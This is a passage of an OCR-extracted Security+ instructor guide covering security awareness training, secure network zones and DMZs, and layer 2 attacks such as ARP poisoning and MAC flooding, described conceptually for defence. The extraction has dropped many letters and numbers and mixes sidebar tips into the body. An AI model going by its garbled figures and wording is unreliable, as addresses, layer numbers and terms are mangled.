organi ation open to a variety of security vulnerabilities. uch programs may provide
a route for data e filtration, a transport mechanism for malware, or possibly software
license violations for which the company might be held liable, ust to name a few of the
potential problems.

Clean es olic
A clean desk policy means that each employee's work area should be free from any
documents left there. The aim of the policy is to prevent sensitive information from
being obtained by unauthori ed sta or guests at the workplace.

User and Role-Based Training Show Slide(s)

Another essential component of a secure system is e ective user training. ntrained User and Role-Based
users represent a serious vulnerability because they are susceptible to social Training
engineering and malware attacks and may be careless when handling sensitive or
confidential data.

Train users in secure behavior. (Image by dotshock 1 .com.)

Lesson 8: Implementing Identity and Account Management Controls | Topic 8D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 210 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Appropriate security awareness training needs to be delivered to employees at all

levels, including end users, technical sta , and e ecutives. ome of the general topics
that need to be covered include the following
• verview of the organi ation's security policies and the penalties for non
compliance.

• Incident identification and reporting procedures.

• ite security procedures, restrictions, and advice, including safety drills, escorting
guests, use of secure areas, and use of personal devices.

• Data handling, including document confidentiality, II, backup, encryption, and so

on.

• assword and account management plus security features of Cs and mobile

devices.

• Awareness of social engineering and malware threats, including phishing, website

e ploits, and spam plus alerting methods for new threats.

• ecure use of software such as browsers and email clients plus appropriate use of
Internet access, including social networking sites.

There should also be a system for identifying sta performing security sensitive
roles and grading the level of training and education re uired between beginner,
intermediate, and advanced, for instance . Note that in defining such training
programs you need to focus on ob roles, rather than ob titles, as employees may
perform di erent roles and have di erent security training, education, or awareness
requirements in each role.

The IST ational Initiative for Cybersecurity Education framework (nist.gov itl applied-
cybersecurity/nice) sets out knowledge, skills, and abilities ( SAAs) for different cybersecurity
roles. Security awareness programs are described in SP 00- 0 (nvlpubs.nist.gov/nistpubs/
egacy SP nistspecialpublication 00- 0.pdf).

Show Slide(s) Diversity of Training Techniques

Diversity of Training
It is necessary to frame security training in language that end users will respond to.
Techniques ducation should focus on responsibilities and threats that are relevant to users. It is
necessary to educate users about new or emerging threats such as fileless malware,
phishing scams, or ero day e ploits in software , but this needs to be stated in
language that users understand.
sing a diversity of training techni ues helps to improve engagement and retention.
Training methods include facilitated workshops and events, one on one instruction and
mentoring, plus resources such as computer-based or online training, videos, books,
and blogs/newsletters.

Phishing Campaigns
A phishing campaign training event means sending simulated phishing messages to
users. sers that respond to the messages can be targeted for follow up training.

Capture the Flag

Capture the Flag (CTF) is usually used in ethical hacker training programs and
gamified competitions. articipants must complete a series of challenges within a
virtuali ed computing environment to discover a ag. The ag will represent either
threat actor activity for blue team e ercises or a vulnerability for red team e ercises

Lesson 8: Implementing Identity and Account Management Controls | Topic 8D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 211

and the participant must use analysis and appropriate tools to discover it. Capturing
the ag allows the user to progress to the ne t level and start a new challenge. nce
the participant has passed the introductory levels, they will join a team and participate
in a competitive event, where there are multiple ags embedded in the environment
and capturing them wins points for the participant and for their team.

Computer ased Trainin and amification

articipants respond well to the competitive challenge of CT events. This type of
gamification can be used to boost security awareness for other roles too. Computer-
based training (CBT) allows a student to acquire skills and experience by completing
various types of practical activities
• imulations recreating system interfaces or using emulators so students can
practice configuration tasks.

• ranching scenarios students choose between options to find the best choices to
solve a cybersecurity incident or configuration problem.

C T might use video game elements to improve engagement. or e ample, students

might win badges and level-up bonuses such as skills or digitized loot to improve
their in-game avatar. Simulations might be presented so that the student chooses
encounters from a map and engages with a simulation environment in a first person
shooter type of D world.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 212 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Importance of Personnel Policies
Answer the following uestions

1. Your company has been the victim of several successful phishing attempts
over the past year. Attackers managed to steal credentials from these
attacks and used them to compromise key systems. What vulnerability
contributed to the success of these social engineers, and why?

A lack of proper user training directly contributes to the success of social engineering
attempts. Attackers can easily trick users when those users are unfamiliar with the
characteristics and ramifications of such deception.

2. h should an or ani ation desi n role ased trainin pro rams

mployees have di erent levels of technical knowledge and di erent work priorities.
This means that a one si e fits all approach to security training is impractical.

3. You are planning a security awareness program for a manufacturer. Is a

pamphlet li el to e su cient in terms o resources

sing a diversity of training techni ues will boost engagement and retention. ractical
tasks, such as phishing simulations, will give attendees more direct experience.
orkshops or computer based training will make it easier to assess whether the
training has been completed.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 213

Lesson 8
Summary
You should be able to apply organizational and technical policies and training/ Teaching
awareness programs that reduce the risk of insider threat and account compromise. Tip
You should also be able to implement discretionary or rule-based access control Check that students
as appropriate and use protocols to communicate authori ations across federated are confident about
identity networks. the content that has
been covered. If there
is time, re-visit any
Guidelines for Implementing Identity and content examples that
they have questions
Account ana ement Controls about. If you have
used all the available
ollow these guidelines when you implement identity and account management time for this lesson
controls for local networks and cloud access block, note the issues,
and schedule time for
• stablish re uirements for access control between discretionary, role based, a review later in the
mandatory, and attribute based and whether the scope must include federated course.
services on premises and cloud, for instance .
Interaction
• Configure accounts roles and resources with the appropriate permissions settings, Opportunity
using the principle of least privilege. Optionally, ask
students if they have
• Configure account policies to protect integrity e perience of single
sign-on with cloud
• Credential policies to ensure protection of standard and privileged accounts, apps, and whether
including secure password selection. they are aware of the
implementation that
• Credential policies to manage shared, device, and third party A I secrets. it uses.

• Account controls to apply conditional access based on location and time.

• rgani ational policies to apply separation of duties and ensure role specific
security awareness and training.

• Establish onboarding procedures to issue digital identities and account credentials

securely.

• stablish auditing procedures to review account usage and allocation of

permissions.

• stablish o boarding procedures to remove access privileges when employees or

contractors leave the company.

• Implement AML or Auth IDC to facilitate single sign on between on premises

networks and cloud services/applications.

Lesson 8: Implementing Identity and Account Management Controls

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 9
Implementing Secure Network Designs

LESSON INTRODUCTION Teaching

Tip
Managing user authentication and authorization is only one part of building secure So far you have
information technology services. The network infrastructure must also be designed covered some of the
to run services with the properties of confidentiality, integrity, and availability. main threat types,
hile design might not be a direct responsibility for you at this stage in your career, ways of scanning for
you should understand the factors that underpin design decisions, and be able to security violations and
vulnerabilities, and
implement a design by deploying routers, switches, access points, and load balancers
the basis of access
in secure configurations. control systems. The
middle part of the
Lesson Objectives course covers secure
network architecture
and infrastructure.
In this lesson, you will There is some overlap
• Implement secure network designs. between Network+
and Security+ in topics
• Implement secure routing and switching. such as switching
and LANs, routing,
• Implement secure wireless infrastructure. firewalls, wireless
security, and mobile
• Implement load balancers. device security. Try to
ensure that students
are up-to-date on their
Network+ knowledge.
Encourage them to
review some of the
material before class.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 216 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 9A
Implement Secure Network Designs

Teaching EXAM OBJECTIVES COVERED

Tip 3.3 Given a scenario, implement secure network designs
Objective 3.3 covers
a wide range of
disparate concepts
and technologies. hile you may not be responsible for network design in your current role, it is
Conse uently, its
important that you understand the vulnerabilities that can arise from weaknesses in
content examples are
split between several network architecture, and some of the general principles for ensuring a well designed
lessons and topics, network. This will help you to contribute to projects to improve resiliency and to make
though we cover the recommendations for improvements.
bulk of them through
lessons 9 and 10.
Secure Network Designs
Show
Slide(s) A secure network design provisions the assets and services underpinning business
work ows with the properties of confidentiality, integrity, and availability. eaknesses
Secure Network
Designs in the network architecture make it more susceptible to undetected intrusions or to
catastrophic service failures. Typical weaknesses include
Teaching • Single points of failure—a "pinch point" relying on a single hardware server or
Tip appliance or network channel.
SAFE architecture is
not listed in the exam • Comple dependencies services that re uire many di erent systems to be
ob ectives, but it is a available. Ideally, the failure of individual systems or services should not a ect the
good starting point for
overall performance of other network services.
network design.
• Availability over confidentiality and integrity often it is tempting to take shortcuts
to get a service up and running. Compromising security might represent a uick fi
but creates long term risks.

• Lack of documentation and change control network segments, appliances, and

services might be added without proper change control procedures, leading to a
lack of visibility into how the network is constituted. It is vital that network managers
understand business work ows and the network services that underpin them.

• verdependence on perimeter security if the network architecture is at that

is, if any host can contact any other host , penetrating the network edge gives the
attacker freedom of movement.

Cisco's A architecture cisco.com/c/en/us/solutions/enterprise/design-zone-security/

landing_safe.html#~overview is a good starting point for understanding the comple
topic of network architecture design. The SAFE guidance refers to places in the network
IN . These represent types of network locations, including campus networks, branch
offices, data centers, and the cloud. There are two special locations in these networks
Internet Edge and WAN—that facilitate connections between locations and with
untrusted networks.
ach IN can be protected with security controls and capabilities, classified into a
series of secure domains, such as threat defense, segmentation, security intelligence,
and management.

Lesson 9: Implementing Secure Network Designs | Topic 9A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 217

usiness or o s and et or Architecture Show

Slide(s)
Network architecture is designed to support business work ows. ou can illustrate the usiness ork ows
sorts of decisions that need to be made by analy ing a simple work ow, such as email and Network
Architecture
• Access the client device must access the network, obtaining a physical channel
and logical address. The user must be authenticated and authorized to use the
Teaching
email application. The corollary is that unauthorized users and devices must be
Tip
denied access.
Stress the point that
• Email mailbox server—ensure that the mailbox is only accessed by authorized the network is there to
clients and that it is fully available and fault tolerant. Ensure that the email service meet business goals.
The network should
runs with a minimum number of dependencies and that the service is designed to
be designed around
be resilient to faults. business logic.

• Mail transfer server this must connect with untrusted Internet hosts, so
communications between the untrusted network and trusted LAN must be carefully
controlled. Any data or software leaving or entering the network must be subject to
policy-based controls.

ou can see that this type of business ow will involve systems in di erent places in
the network. lacing the client, the mailbo , and the mail transfer server all within the
same logical network "segment" will introduce many vulnerabilities. Understanding and
controlling how data ows between these locations is a key part of secure and e ective
network design.

Network Appliances Show

Slide(s)
A number of network appliances are involved in provisioning a network architecture Network Appliances
• Switches—forward frames between nodes in a cabled network. Switches work at
layer 2 of the OSI model and make forwarding decisions based on the hardware Teaching
or Media Access Control MAC address of attached nodes. witches can establish Tip
network segments that either map directly to the underlying cabling or to logical This section is
segments, created in the switch configuration as virtual LANs (VLANs). intended as a brief
primer for students
who have not
When designing and troubleshooting a network, it is helpful to compartmentalize functions completed Network+.
to discrete layers. The Open Systems Interconnection (OSI) model is a widely uoted ou will not need
example of how to define layers of network functions. to spend time on it
otherwise.
The OSI model does
• Wireless access points—provide a bridge between a cabled network and wireless get mentioned in the
clients, or stations. Access points work at layer of the I model. Security+ syllabus
though later on, in the
• Routers forward packets around an internetwork, making forwarding decisions context of deploying
based on I addresses. outers work at layer of the I model. outers can apply firewalls to the cloud
logical I subnet addresses to segments within a network. so students will need
to know the layer
• irewalls apply an access control list ACL to filter traffic passing in or out of a IDs. We have omitted
layers 5 and 6 from
network segment. Firewalls can work at layer 3 of the OSI model or higher. the diagram, however.
ou might want to
• Load balancers distribute traffic between network segments or servers to optimi e point out the much
performance. Load balancers can work at layer 4 of the OSI model or higher. simpler four layer TC
I model.
• Domain Name ystem DN servers host name records and perform name
resolution to allow applications and users to address hosts and services using fully
ualified domain names DNs rather than I addresses. DN works at layer
of the I model. Name resolution is a critical service in network design. Abuse of
name resolution is a common attack vector.

Lesson 9: Implementing Secure Network Designs | Topic 9A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 218 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Appliances, protocols, and addressing functions within the OSI network layer reference model.
(Images 1 .com.)

Show Routing and Switching Protocols

Slide(s)
outing and witching
The basic function of a network is to forward traffic from one node to another. A
rotocols number of routing and switching protocols are used to implement forwarding. The
forwarding function takes place at two di erent layers
Teaching
• Layer 2 forwarding occurs between nodes on the same local network segment that
Tip
are all in the same broadcast domain. At layer , a broadcast domain is either all the
This section is
nodes connected to the same physical unmanaged switch, or all the nodes within a
intended as a brief
primer for students virtual LAN LAN configured on one or more managed switches. At layer , each
who have not node is identified by the network interface's hardware or Media Access Control
completed Network+. MAC address. A MAC address is a bit value written in he adecimal notation,
ou will not need such as D .
to spend time on it
otherwise. • Layer forwarding, or routing, occurs between both logically and physically defined
networks. A single network divided into multiple logical broadcast domains is said to
be subnetted. Multiple networks oined by routers form an internetwork. At layer ,
nodes are identified by an Internet rotocol I address.

Address Resolution Protocol (ARP)

The Address esolution rotocol A maps a network interface's hardware MAC
address to an I address. Normally a device that needs to send a packet to an I
address but does not know the receiving device's MAC address broadcasts an A
e uest packet, and the device with the matching I responds with an A eply.

Lesson 9: Implementing Secure Network Designs | Topic 9A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 219

A P in action An A P broadcast is used when there is no AC IP mapping in the cache and is

received by all hosts on the same network, but only the host with the re uested
IP should reply. (Images 1 .com.)

Internet Protocol (IP)

I provides the addressing mechanism for logical networks and subnets. A bit I v
address is written in dotted decimal notation, with either a network prefi or subnet
mask to divide the address into network ID and host ID portions. or e ample, in the
I address . . . , the prefi indicates that the first half of the address
. . . is the network ID, while the remainder uni uely identifies a host on that
network. This prefi can also be written as a subnet mask in the form . . . . Show
Networks also use bit I v addressing. I v addresses are written using he Slide(s)
notation in the general format db abc def . In I v , the last bits Network egmentation
are fi ed as the host's interface ID. The first bits contain network information in
a set hierarchy. or e ample, an I 's routers can use the first bits to determine Teaching
where the network is hosted on the global Internet. ithin that network, the site Tip
administrator can use the bits remaining out of to divide the local network into Note that segment
subnets. can take on di erent
meanings depending
on the network layer
Routing Protocols conte t. This definition
ignores the lower level
Information about how to reach individual networks within an internetwork is
concept of collision
processed by routers, which store the data in a routing table. A route to a network can domains.
be configured statically, but most networks use routing protocols to transmit new The basic point is to
and updated routes between routers. Some common routing protocols include Border create blocks where
Gateway Protocol (BGP), Open Shortest Path First (OSPF), Enhanced Interior hosts within the
Gateway Routing Protocol (EIGRP), and Routing Information Protocol (RIP). segment are free
to communicate
with one another,
et or e mentation but communication
between segments
A network segment is one where all the hosts attached to the segment can use local is subject to access
layer forwarding to communicate freely with one another. The hosts are said to be policies.

Lesson 9: Implementing Secure Network Designs | Topic 9A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 220 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

within the same broadcast domain. Segregation means that the hosts in one segment
are restricted in the way they communicate with hosts in other segments. They might
only be able to communicate over certain network ports, for instance.

reely means that no network appliances or policies are preventing communications. Each
host may be configured with access rules or host firewalls or other security tools to prevent
access, but the "view from the network" is that hosts in the same segment are all free to
attempt to communicate.

Assuming an thernet network, network segments can be established physically by

connecting all the hosts in one segment to one switch and all the hosts in another
segment to another switch. The two switches can be connected by a router and
the router can enforce network policies or access control lists ACL to restrict
communications between the two segments.
Because enterprise networks typically feature hundreds of switching appliances and
network ports not to mention wireless access and remote access , segmentation is
more likely to be enforced using virtual LANs LANs . Any given switch port can be
assigned to any LAN in the same topology, regardless of the physical location of
the switch. The segmentation enforced by VLANs at layer 2 can be mapped to logical
divisions enforced by I subnets at layer .

Show et or Topolo and ones

Slide(s)
Network Topology and
iven the ability to create segregated segments with the network, you can begin to
ones define a topology of di erent network ones. A topology is a description of how a
computer network is physically or logically organized. The logical and physical network
Teaching topology should be analyzed to identify points of vulnerability and to ensure that the
Tip goals of confidentiality, integrity, and availability are met by the design.
Note that zone is The main building block of a security topology is the zone. A zone is an area of the
a wholly logical
network where the security configuration is the same for all hosts within it. ones
concept. A zone is
a combination of a should be segregated from one another by physical and or logical segmentation, using
LAN, subnet, and LANs and subnets. Traffic between ones should be strictly controlled using a security
access control list. device, typically a firewall.
Dividing a campus network or data center into zones implies that each zone has a
di erent security configuration. The main ones are as follows
• Intranet (private network)—this is a network of trusted hosts owned and
controlled by the organi ation. ithin the intranet, there may be sub ones for
di erent host groups, such as servers, employee workstations, oI handsets, and
management workstations.

osts are trusted in the sense that they are under your administrative control and sub ect to
the security mechanisms (anti-virus software, user rights, software updating, and so on) that
you have set up to defend the network.

• tranet this is a network of semi trusted hosts, typically representing business

partners, suppliers, or customers. osts must authenticate to oin the e tranet.

• Internet guest this is a one permitting anonymous access or perhaps a mi of

anonymous and authenticated access by untrusted hosts over the Internet.

A large network may need more ones to represent di erent host groups, such as
separating wireless stations from desktop workstations, and putting servers in their
own groups. Cisco's enterprise security architecture uses core and distribution layers
to interconnect access blocks, with each access block representing a di erent one and
business function.

Lesson 9: Implementing Secure Network Designs | Topic 9A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 221

Enterprise security architecture. (Images 1 .com.)

Demilitarized Zones Show

Slide(s)
The most important distinction between di erent security ones is whether a host Demilitari ed ones
is Internet-facing. An Internet-facing host accepts inbound connections from and
makes connections to hosts on the Internet. Internet-facing hosts are placed in one Teaching
or more demilitarized zones (DMZs). A DM is also referred to as a perimeter or Tip
edge network. The basic principle of a DM is that traffic cannot pass directly through oint out that when
it. A DM enables e ternal clients to access data on private systems, such as web a DM is used for a
servers, without compromising the security of the internal network as a whole. If remote access N,
communication is re uired between hosts on either side of a DM , a host within the you are allowing
DM acts as a pro y. or e ample, if an intranet host re uests a connection with a traffic through, but
only where it is fully
web server on the Internet, a pro y in the DM takes the re uest and checks it. If the authenticated and
re uest is valid, it retransmits it to the destination. ternal hosts have no idea about subject to access
what if anything is behind the DM . controls.
Both extranet and Internet services are likely to be Internet-facing. The hosts that
provide the extranet or public access services should be placed in one or more
demilitari ed ones. These would typically include web servers, mail and other
communications servers, pro y servers, and remote access servers. The hosts in a
DM are not fully trusted by the internal network because of the possibility that they
could be compromised from the Internet. They are referred to as bastion hosts and
run minimal services to reduce the attack surface as much as possible. A bastion host
would not be configured with any data that could be a security risk to the internal
network, such as user account credentials.
It is uite likely that more than one DM will be re uired as the services that run in
them may have di erent security re uirements
• A DM hosting pro ies or secure web gateways to allow employees access to web
browsing and other Internet services.

Lesson 9: Implementing Secure Network Designs | Topic 9A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 222 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• A DM hosting communication servers, such as email, oI , and conferencing.

• A DM for servers providing remote access to the local network via a irtual rivate
Network N.

• A DM hosting traffic for authori ed cloud applications.

• A multi tier DM to isolate front end, middleware, and backend servers.

Show Demilitarized Zone Topologies

Slide(s)
Demilitari ed one
To configure a DM , two di erent security configurations must be enabled one on
Topologies the e ternal interface and one on the internal interface. A DM and intranet are on
di erent subnets, so communications between them need to be routed.

Screened Subnet
A screened subnet uses two firewalls placed on either side of the DM . The edge
firewall restricts traffic on the e ternal public interface and allows permitted traffic
to the hosts in the DM . The edge firewall can be referred to as the screening firewall
or router. The internal firewall filters communications between hosts in the DM and
hosts on the LAN. This firewall is often described as the choke firewall. A choke point
is a purposefully narrow gateway that facilitates better access control and easier
monitoring.

A screened subnet topology. (Images 1 .com.)

Triple-Homed Firewall
A DM can also be established using one router firewall appliance with three network
interfaces, referred to as triple homed. ne interface is the public one, another is the
DM , and the third connects to the LAN. outing and filtering rules determine what
forwarding is allowed between these interfaces. This can achieve the same sort of
configuration as a screened subnet.

Lesson 9: Implementing Secure Network Designs | Topic 9A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 223

A triple-homed firewall topology. (Images 1 .com.)

Screened Hosts Show

Slide(s)
Smaller networks may not have the budget or technical expertise to implement a creened osts
DM . In this case, Internet access can still be implemented using a dual homed pro y
gateway server acting as a screened host. Teaching
Tip
or e ample, see this
Netgear technical
note kb.netgear.
com ow do I
configure a device to
be in the DM on my
N T A router . Tell
students they should
be aware of this mis
use of the term for the
certification e am.

A screened host. (Images 1 .com.)

ometimes the term DM or DM host is used by router vendors to mean

a host on the local network that accepts connections from the Internet. This might be
simpler to configure and solve some access problems, but it makes the whole network
very vulnerable to intrusion and Do . An enterprise DM is established by a separate
network interface and subnet so that traffic between hosts in the DM and the LAN
must be routed and sub ect to firewall rules . Most routers do not have the
necessary ports or routing functionality to create a true DM .

Lesson 9: Implementing Secure Network Designs | Topic 9A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 224 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Implications of IPv6

Slide(s)
Implications of I v
I v has impacts for premises networks, for the way your company accesses cloud
services, and for the way clients access web servers and other public servers that
you publish.
I v may be enabled by default on clients and servers, and even on network
appliances routers and firewalls , so there must be a management and security
plan for it. If I v is enabled but unmanaged, there is the potential for malicious
use as a backdoor or covert channel. I v also e poses novel attack vectors, such
as spoofing and Do attacks on neighbor discovery tools.cisco.com/security/center/
resources ipv first hop .
osts should be allocated I v addresses that map to the same ones as the I v
topology. irewalls should be configured with ACLs that either achieve the same
security configuration as for I v or block I v , if that is a better option. ne issue
here is that I v is not intended to perform any type of address translation. ather
than obscure internal e ternal traffic ows with private to public address mapping,
I v routing and filtering policies should be configured to mirror the e uivalent
I v architecture.

The Internet Society has published a white paper on security implications of IPv6
(internetsociety.org wp-content uploads 01 0 deploy 60-ipv6-security-v1.0.pdf).
Infoblox s white paper on migrating services to IPv6 provides more useful context (infoblox.
com wp-content uploads 016 0 infoblox-whitepaper-seven-deadly-traps-of-ipv6-
deployment 0.pdf).

Show Slide(s) Other Secure Network Design Considerations

Other Secure Network
Network design must also be considered for data centers and the cloud. A data
Design Considerations center is a facility dedicated to hosting servers, rather than a mi of server and client
workstation machines.
Teaching
Tip ast est Tra c
This content is
Traffic that goes to and from a data center is referred to as north south. This traffic
included in this topic
to simplify the syllabus represents clients outside the data center making requests and receiving responses.
mapping, but you may In data centers that support cloud and other Internet services, most traffic is actually
want to delay covering between servers within the data center. This is referred to as east est tra c.
it to the cloud lesson.
Consider a client uploading a photograph as part of a social media post. The image
file might be checked by an analysis server for policy violations indecent or copyright
images, for instance , a search inde ing service would be updated with the image
metadata, the image would be replicated to servers that provision content delivery
networks CDNs , the image would be copied to backup servers, and so on. A single
request to the cloud tends to cascade to multiple requests and transfers within
the cloud.
The preponderance of east west traffic complicates security design. If each of these
cascading transactions were to pass though a firewall or other security appliance,
it would create a severe bottleneck. These requirements are driving the creation of
virtuali ed security appliances that can monitor traffic as it passes between servers
blogs.cisco.com security trends in data center security part traffic trends .

Zero Trust
Zero trust is based on the idea that perimeter security is unlikely to be completely
robust. n a modern network, there are ust too many opportunities for traffic to

Lesson 9: Implementing Secure Network Designs | Topic 9A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 225

escape monitoring by perimeter devices and DM s. ero trust uses systems such as
continuous authentication and conditional access to mitigate privilege escalation and
account compromise by threat actors.
Another zero trust technique is to apply microsegmentation. Microsegmentation is a
security process that is capable of applying policies to a single node, as though it was
in a one of its own. Like east west traffic, this re uires a new generation of virtuali ed
security appliances to implement vmware.com/solutions/micro-segmentation.html .

Lesson 9: Implementing Secure Network Designs | Topic 9A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 226 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Secure Network Designs
Answer the following uestions

1. A recent security evaluation concluded that your company's network design

is too consolidated osts ith ildl di erent unctions and purposes are
grouped together on the same logical area of the network. In the past, this
has enabled attackers to easily compromise large swaths of network hosts.
What technique(s) do you suggest will improve the security of the network's
design, and why?

In general, you should start implementing some form of network segmentation to

put hosts with the same security re uirements within segregated ones. or e ample,
the workstations in each business department can be grouped in their own subnets
to prevent a compromise of one subnet from spreading to another. Likewise, with
LANs, you can more easily manage the logical segmentation of the network without
disrupting the physical infrastructure i.e., devices and cabling .

2. You are discussing a redesign of network architecture with a client, and

the ant to no hat the di erence et een an e tranet and Internet
is. How can you explain it?

The Internet is an external zone where none of the hosts accessing your services can
be assumed trusted or authenticated. An extranet is a zone allowing controlled access
to semi trusted hosts, implying some sort of authentication. The hosts are semi trusted
because they are not under the administrative control of the organi ation as they are
owned by suppliers, customers, business partners, contractors, and so on .

3. Why is subnetting useful in secure network design?

ubnet traffic is routed, allowing it to be filtered by devices such as a firewall. An

attacker must be able to gather more information about the configuration of the
network and overcome more barriers to launch successful attacks.

4. How can an enterprise DMZ be implemented?

y using two firewalls e ternal and internal around a screened subnet, or by using a
triple homed firewall one with three network interfaces .

5. hat t pe o net or re uires the desi n to account or east est tra c

This is typical of a data center or server farm, where a single e ternal re uest causes
multiple cascading requests between servers within the data center. This is a problem
for a perimeter security model, as funneling this traffic up to a firewall and then back to
a server creates a performance bottleneck.

Lesson 9: Implementing Secure Network Designs | Topic 9A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 227

Topic 9B
Implement Secure
Switching and Routing

EXAM OBJECTIVES COVERED Teaching

1. Given a scenario, analyze potential indicators associated with network attacks Tip
.1 Given a scenario, implement secure protocols ( outing and switching only)
As well as port
. Given a scenario, implement secure network designs security, NAC, and
route security, this
topic covers man-in-
Attacks aimed at low level networking functions can be highly e ective. To implement the-middle and layer 2
a network design that demonstrates confidentiality, integrity, and availability, you must network attacks.
configure switches and routers with appropriate settings. These devices can be used
to enforce network access control mechanisms and ensure fault-tolerant paths within
the network.
Show Slide(s)
an in the iddle and a er Attac s
Man-in-the-Middle and
Attacks at the physical and data link layers, referred to in the I model as layer Layer 2 Attacks
and layer , are often focused on information gathering network mapping and
eavesdropping on network traffic. Teaching
Tip
Man-in-the-Middle/On-Path Attacks Emphasize the lack of
authentication at layer
Attackers can also take advantage of the lack of security in low-level data link protocols
, the basic operation
to perform man-in-the-middle (MitM) attacks. A MitM or on-path attack is where of A , and the ways
the threat actor gains a position between two hosts, and transparently captures, it can be subverted to
monitors, and relays all communication between the hosts. An on path attack could perform DoS or MitM
also be used to covertly modify the traffic. or e ample, a MitM host could present a snooping.
workstation with a spoofed website form, to try to capture the user credential. Another oint out that on an
common on path attack spoofs responses to DN ueries, redirecting users to spoofed I v network, the
websites. n path attacks can be defeated using mutual authentication, where both Neighbor Discovery
rotocol ND serves
hosts e change secure credentials, but at layer it is not always possible to put these the same function
controls in place. as A and is also
vulnerable to cache
AC Clonin pollution. There is,
however, a secure
MAC cloning, or MAC address spoofing, changes the hardware address configured on form of the protocol
an adapter interface or asserts the use of an arbitrary MAC address. While a unique ND .
MAC address is assigned to each network interface by the vendor at the factory, it is MitM is non-inclusive
simple to override it in software via commands, alterations to the network driver terminology. On-path
is now the preferred
configuration, or using packet crafting software. This can lead to a variety of issues
term, though we will
when investigating security incidents or when depending on MAC addresses as part of continue to use both
a security control, as the presented address of the device may not be reliable. in the course.

A oisonin and AC loodin Attac s Show Slide(s)

A host uses the Address Resolution Protocol (ARP) to discover the host on the local A oisoning and
segment that owns an I address. MAC Flooding Attacks

Lesson 9: Implementing Secure Network Designs | Topic 9B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 228 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

A oisonin Attac s
An ARP poisoning attack uses a packet crafter, such as ttercap, to broadcast
unsolicited A reply packets. ecause A has no security mechanism, the receiving
devices trust this communication and update their MAC I address cache table with the
spoofed address.

Packet capture opened in ireshark showing A P poisoning.

(Screenshot used with permission from wireshark.org.)

This screenshot shows packets captured during a typical A poisoning attack

• In frames , the attacking machine with MAC address ending a directs
gratuitous A replies at other hosts and , claiming to have the I addresses
.2 and .102.

• In frame , the . host tries to send a packet to the . host, but it is received
by the attacking host with the destination MAC a .

• In frame , the attacking host retransmits frame to the actual . host. ireshark
colors the frame black and red to highlight the retransmission.

• In frames and , you can see the reply from . , received by the attacking host in
frame 11 and retransmitted to the legitimate host in frame 12.

The usual target will be the subnet's default gateway the router that accesses other
networks . If the A poisoning attack is successful, all traffic destined for remote
networks will be sent to the attacker. The attacker can perform a man-in-the-middle
attack, either by monitoring the communications and then forwarding them to the
router to avoid detection, or modifying the packets before forwarding them. The
attacker could also perform a denial of service attack by not forwarding the packets.

AC loodin Attac s
here A poisoning is directed at hosts, AC oodin is used to attack a switch.
The intention of the attacker is to exhaust the memory used to store the switch's MAC
address table. The switch uses the MAC address table to determine which port to use to

Lesson 9: Implementing Secure Network Designs | Topic 9B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 229

forward unicast traffic to its correct destination. verwhelming the table can cause the
switch to stop trying to apply MAC based forwarding and ood unicast traffic out of all
ports, working as a hub. This makes sniffing network traffic easier for the threat actor.

Loop Prevention Show Slide(s)

An Ethernet switch's layer 2 forwarding function is similar to that of an older network Loop revention
appliance called a bridge. In a network with multiple bridges, implemented these
days as switches, there may be more than one path for a frame to take to its intended Teaching
destination. As a layer protocol, thernet has no concept of Time To Live. Therefore, Tip
layer broadcast traffic could continue to loop through a network with multiple Students should be
paths indefinitely. Layer loops are prevented by the Spanning Tree Protocol (STP). familiar with the
Spanning tree is a means for the bridges to organize themselves into a hierarchy and concept of T from
prevent loops from forming. the Network+ course.

STP configuration.

